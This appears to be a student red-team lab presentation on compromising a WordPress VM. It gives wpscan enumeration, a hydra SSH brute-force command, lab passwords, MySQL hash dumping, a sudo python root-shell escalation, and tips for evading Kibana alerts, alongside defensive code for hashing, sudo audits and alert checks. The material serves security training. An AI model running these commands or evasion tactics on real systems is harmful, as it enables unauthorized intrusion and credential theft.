1 of 16

Red Team Engagement

Attack, Defense & Analysis of a Vulnerable Network

2 of 16

Table of Contents

This presentation contains the following resources:

  • 01  Network Topology & Critical Vulnerabilities
  • 02  Exploits Used
  • 03  Methods Used to Avoid Detection

3 of 16

Network Topology & Critical Vulnerabilities

This section will assess the network topology used in this engagement followed by the critical vulnerabilities found on the Target 1 Virtual Machine when attacked using a Kali Linux Virtual Machine.

4 of 16

Network Topology

Network
  • Address Range: 192.168.1.0/24
  • Netmask:
  • Gateway: 192.168.1.1

Machines
  • Hostname: Kali
    • IPv4: 192.168.1.90
    • OS: Debian Kali 5.4.0
  • Hostname: Target 1
    • IPv4: 192.168.1.110
    • OS: Debian GNU/Linux 8
  • Hostname: Capstone
    • IPv4: 192.168.1.105
    • OS: Ubuntu 18.04
  • Hostname: ELK
    • IPv4: 192.168.1.100
    • OS: Ubuntu 18.04

5 of 16

Critical Vulnerabilities on Target 1:

  • WordPress User Enumeration
    • Description: Used enumeration to gather user information from the web server.
    • Impact: Allowed the attacker to gather usernames that were then used to gain access to the web server.
  • Weak Passwords
    • Description: Passwords were found using John the Ripper and simple guessing, giving access to user logins.
    • Impact: Allowed the attacker to gain access to protected web directories.
  • Unsalted User Password Hash
    • Description: An unsalted user password hash makes it easier for a malicious actor to crack a user's password.
    • Impact: Allows attackers to recover passwords from the stored hashes with little effort.
  • Misconfiguration of User Privileges
    • Description: Used Steven's sudo access to escalate from Steven to root.
    • Impact: Allowed privilege escalation to root.

6 of 16

Screenshots of Critical Vulnerabilities:

  • Command run to find vulnerabilities: nmap --script vulners -sV 192.168.1.110
  • https://nvd.nist.gov/vuln/search

7 of 16

Exploits Used

This section will demonstrate the methods taken to execute the exploits on the Target 1 Virtual Machine.

8 of 16

Exploitation: WordPress Enumeration

Summarize the following:

    • How did you exploit the vulnerability?
      • Used wpscan --url http://192.168.1.110/wordpress --enumerate u to enumerate the users on the web server.
    • What did the exploit achieve?
      • Gained critical information, such as usernames, in order to SSH into the server.

9 of 16

Exploitation: Weak Passwords

Summarize the following:

      • How did you exploit the vulnerability?
        • Used manual brute force to guess the password.
        • Username: Michael
        • Password: michael
        • NOTE: The Hydra tool can be used to brute-force the password if it cannot be guessed easily.
        • Command syntax:
        • hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.110
      • What did the exploit achieve?
        • Granted SSH access to Michael's account, which was used to gather the MySQL database password from the wp-config.php file in the wordpress folder under the html directory.

10 of 16

Exploitation: Unsalted User Password Hash

Summarize the following:

    • How did you exploit the vulnerability?
      • Once we had the password R@v3nSecurity from Michael's account, we were able to use MySQL to find Steven's unsalted password hash:
        • mysql -u root -p
        • Password: R@v3nSecurity
        • show databases;
        • use wordpress;
        • show tables;
        • select * from wp_users;
      • Used the John the Ripper tool to recover Steven's password from the hash.
    • What did the exploit achieve?
      • Gave us Steven's password to SSH into his account and access his information.
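To show why the unsalted hash in wp_users was the weak point, here is an added example (not code from the engagement or from WordPress) that stores the same constructed set of passwords both unsalted and with a per-user random salt, then checks which stored values collide. The MD5-as-unsalted-scheme, PBKDF2 parameters and user records are assumptions for illustration.

```python
import hashlib
import hmac
import os

# Constructed user records (not the engagement's real data): two users happen
# to share a password, which is exactly what unsalted storage exposes.
USERS = {"michael": "michael", "steven": "pink84", "alice": "michael"}

def unsalted_hash(password):
    """Bare MD5 of the password with no per-user salt (assumed scheme for the weak form)."""
    return hashlib.md5(password.encode()).hexdigest()

def salted_hash(password, salt=None, iterations=100_000):
    """Per-user random salt plus a slow KDF; stored as alg$iterations$salt$digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _alg, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)

def unsalted_table(users):
    return {user: unsalted_hash(pw) for user, pw in users.items()}

def salted_table(users):
    return {user: salted_hash(pw) for user, pw in users.items()}

def duplicate_hash_groups(hashes):
    """Map each stored value to the users sharing it; a group means one cracked
    hash (or one precomputed table entry) unlocks every account in it."""
    groups = {}
    for user, value in hashes.items():
        groups.setdefault(value, []).append(user)
    return {value: users for value, users in groups.items() if len(users) > 1}

if __name__ == "__main__":
    print(duplicate_hash_groups(unsalted_table(USERS)))  # michael and alice collide
    print(duplicate_hash_groups(salted_table(USERS)))    # {} : salts make every row unique
```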

11 of 16

Exploitation: Misconfiguration of User Privileges

Summarize the following:

  • How did you exploit the vulnerability?
    • After gaining access to Steven's user account:
      • Used sudo -l to list the commands Steven was allowed to run as root.
      • Used sudo python -c 'import pty;pty.spawn("/bin/bash")' to obtain a root shell.

  • What did the exploit achieve?
    • Obtained access to the user shell and ultimately escalated to root:
      • ssh steven@192.168.1.110
      • Password: pink84
      • sudo -l
      • sudo python -c 'import pty;pty.spawn("/bin/bash")'
      • cd /root
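A defender can catch this misconfiguration before an attacker does by auditing what sudo -l reports. The following is an added example, not part of the engagement, that parses a constructed sudo -l listing (the format and hostname are assumed, as is the small list of shell-capable interpreters) and flags entries that amount to a root shell.

```python
import re
from pathlib import PurePosixPath

# Binaries that hand back an interactive shell when run as root; the page's
# python entry is one case. Assumed starter list, extend it for your environment.
SHELL_CAPABLE = {"python", "python2", "python3", "sh", "bash"}

# Constructed `sudo -l` output in the usual sudo layout (not a captured transcript).
SAMPLE_SUDO_L = """\
Matching Defaults entries for steven on target1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User steven may run the following commands on target1:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: command ..." ; tags such as NOPASSWD are optional
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_l(text):
    """Return (runas, tags, command) for each entry after 'may run the following commands'."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        match = ENTRY_RE.match(line) if in_cmds else None
        if match:
            tags = {t.strip(":") for t in match.group("tags").split()}
            entries.append((match.group("runas").strip(), tags, match.group("cmd").strip()))
    return entries

def risky_entries(text):
    """Flag entries that grant a root shell in practice: ALL, or a shell-capable interpreter."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = PurePosixPath(cmd.split()[0]).name
        if cmd == "ALL" or binary in SHELL_CAPABLE:
            why = "ALL commands" if cmd == "ALL" else f"{binary} can spawn a shell"
            findings.append({"runas": runas, "cmd": cmd,
                             "nopasswd": "NOPASSWD" in tags, "why": why})
    return findings

if __name__ == "__main__":
    for finding in risky_entries(SAMPLE_SUDO_L):
        print(finding)  # the python entry is reported; systemctl is not
```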

12 of 16

Methods Used to Avoid Detection

This section will detail the alerts placed in Kibana and what methods can be used to attack the machine while mitigating detection.

13 of 16

Stealth Exploitation of WordPress User Enumeration

Mitigating Detection

  • These types of alerts are resource intensive, so most companies run them during off hours; it would be best to perform the attack during business hours in order to mitigate detection.
  • Adding flags that take a more "stealthy" approach would limit the number of HTTP request bytes sent.

Monitoring Overview

      • Which alerts detect this exploit?
        • In Kibana the alert is set to:

WHEN sum() OF http.request.bytes OVER all documents IS ABOVE 3500 FOR THE LAST 1 minute

      • Which metrics do they measure?
        • http.request.bytes
      • Which thresholds do they fire at?
        • above 3500

14 of 16

Stealth Exploitation of SSH

Monitoring Overview

    • Which alerts detect this exploit?
      • Alert in Kibana:

WHEN count() GROUPED OVER top 5 'http.response.status_code' IS ABOVE 400 FOR THE LAST 5 minutes

    • Which metrics do they measure?
      • http.response.status_code
    • Which thresholds do they fire at?
      • Above 400

Mitigating Detection

    • In order to limit the number of error codes above 400, it would be critical to obtain the targeted user's login credentials using methods that cannot be detected by this alert, such as spear phishing or performing a man-in-the-middle attack.

15 of 16

Stealth Exploitation of Directory Exploration

Monitoring Overview

      • Which alerts detect this exploit?
        • In Kibana the alert is set to:

WHEN max() OF system.process.cpu.total.pct OVER all documents IS ABOVE 0.5 FOR THE LAST 5 minutes

      • Which metrics do they measure?
        • system.process.cpu.total.pct
      • Which thresholds do they fire at?
        • CPU usage greater than or equal to 0.5 (50%)
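The three Kibana alerts above (HTTP request bytes, HTTP status codes, process CPU) can be reproduced outside Kibana to sanity-check their thresholds. This is an added example, not the team's or Elastic's code: it evaluates the same three rules over constructed Beats-style documents; the field names follow the alerts, while the timestamps and values are invented.

```python
from collections import Counter
from datetime import datetime, timedelta

def build_sample_events():
    """Constructed documents (not data from the engagement) using the fields the alerts reference."""
    base = datetime(2021, 1, 1, 10, 0, 0)
    events = []
    # three wpscan-sized requests inside one minute; bytes sum to 3800
    for sec, nbytes in ((5, 900), (20, 1400), (45, 1500)):
        events.append({"ts": base + timedelta(seconds=sec), "http.request.bytes": nbytes})
    # 450 responses with status 401 in the same minute: a failed-login burst
    for i in range(450):
        events.append({"ts": base + timedelta(seconds=i % 60), "http.response.status_code": 401})
    # per-process CPU samples; one process spikes to 62%
    for sec, pct in ((30, 0.12), (50, 0.62), (55, 0.20)):
        events.append({"ts": base + timedelta(seconds=sec), "system.process.cpu.total.pct": pct})
    return events

def in_window(events, window_end, minutes):
    """Documents whose timestamp falls within the last `minutes` before window_end (inclusive)."""
    start = window_end - timedelta(minutes=minutes)
    return [e for e in events if start <= e["ts"] <= window_end]

def http_bytes_alert(events, window_end, threshold=3500, minutes=1):
    """WHEN sum() OF http.request.bytes OVER all documents IS ABOVE 3500 FOR THE LAST 1 minute."""
    total = sum(e.get("http.request.bytes", 0) for e in in_window(events, window_end, minutes))
    return total > threshold

def status_code_alert(events, window_end, threshold=400, minutes=5, top=5):
    """WHEN count() GROUPED OVER top 5 http.response.status_code IS ABOVE 400 FOR THE LAST 5 minutes:
    fires if any of the five most frequent status codes has more than `threshold` documents."""
    codes = Counter(e["http.response.status_code"] for e in in_window(events, window_end, minutes)
                    if "http.response.status_code" in e)
    return any(n > threshold for _, n in codes.most_common(top))

def cpu_alert(events, window_end, threshold=0.5, minutes=5):
    """WHEN max() OF system.process.cpu.total.pct OVER all documents IS ABOVE 0.5 FOR THE LAST 5 minutes."""
    samples = [e["system.process.cpu.total.pct"] for e in in_window(events, window_end, minutes)
               if "system.process.cpu.total.pct" in e]
    return max(samples, default=0.0) > threshold

def evaluate_alerts(events, window_end_iso):
    """Evaluate all three rules at one instant (ISO 8601 string); returns {rule: fired?}."""
    end = datetime.fromisoformat(window_end_iso)
    return {"http_request_bytes": http_bytes_alert(events, end),
            "http_status_codes": status_code_alert(events, end),
            "process_cpu": cpu_alert(events, end)}

if __name__ == "__main__":
    print(evaluate_alerts(build_sample_events(), "2021-01-01T10:01:00"))  # all three rules fire
```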

Mitigating Detection

    • Google Dorking could be used to find company employees (users), email addresses, vulnerable files and servers, and possibly even passwords.

16 of 16

The End

Austin Baxter, Ben Horsley, Lauren Williams, Steph Hoffman, & Tom Kuhn